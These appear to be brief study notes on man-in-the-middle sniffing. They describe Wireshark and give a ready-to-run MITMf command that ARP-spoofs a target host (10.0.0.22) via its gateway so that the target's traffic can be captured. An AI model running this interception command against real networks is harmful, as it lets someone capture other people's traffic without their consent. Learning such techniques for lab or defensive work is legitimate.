MITM - Wireshark
WIreshark is a network protocol analyser that is designed to help network administartors to keep track of what is happening in their network and analyse all the packtes.
Wireshark works by logging each packet that flows through the device.
Usage:
python2 mitmf.py --arp --spoof -i wlan0 --gateway 10.0.0.1 --target 10.0.0.22 wireshark
The wireshark can analysis the packages from target machine.